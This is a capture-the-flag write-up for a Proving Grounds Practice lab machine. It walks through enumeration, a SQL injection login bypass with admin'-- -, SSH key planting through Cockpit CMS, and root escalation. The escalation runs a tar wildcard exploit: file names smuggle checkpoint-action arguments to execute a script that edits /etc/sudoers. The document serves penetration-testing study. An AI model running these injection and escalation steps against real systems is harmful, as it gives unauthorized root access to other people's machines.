Enumeration

Nmap

Initial Nmap scan revealed HTTP, SSH ports and 9090 ports were open.

00 - nmap

WEB Enumeration

The website at port 80 seemed like dummy website. I did directory enumeration and could not find any useful folder.

01 - website port 80

Then checked 9090, it was also a website. It was Cockpit CMS website and I tried some known vulnerabilities but none of them worked.

02 - 9090 port

Then I used different wordlist raft-medium-files.txt from seclists which includes common files and it worked. I found login.php file on port 80.

03 - login website

04 - website

Exploitation

SQL Injection

At first I tried simple ‘ to check if it would throw any errors. And indeed it threw and error.

05 - error

Then tried OR 1=1, AND 1=1 and other common methods bot all of them were blocked.

06 - blocked

Then I simply tried admin’ – - and it was it, I simply got inside the website and obtained user passwords.

07 - 0 sqli

07 - 1 sqli

Cockpit CMS (Add SSH Public Key)

Then I base64 decoded user passwords and logged in to Cockpit CMS.

08 - logged in

Then I simply added my local id_rsa.pub (ssh public key) to Cockpit CMS.

09 - ssh public key

And with this I got the user and its flag.

10 - user flag

Privilege Escalation

Tar Wildcard Abuse

sudo -l revealed I could run tar binary with wildcard (*) as root.

11 - sudo l

So it was simple. I applied steps in tar wildcard abuse:

mkdir tmp/tar_test
cd tmp/tar_test
echo 'echo "james ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1
sudo /usr/bin/tar -czvf /tmp/backup.tar.gz *

And applying these steps got me NOPASSWD sudo for all commands.

12 - tar wildcard abuse

I then simple got root.

13 - root

<
Previous Post
Clue - Proving Grounds Practice
>
Next Post
Codo - Proving Grounds Practice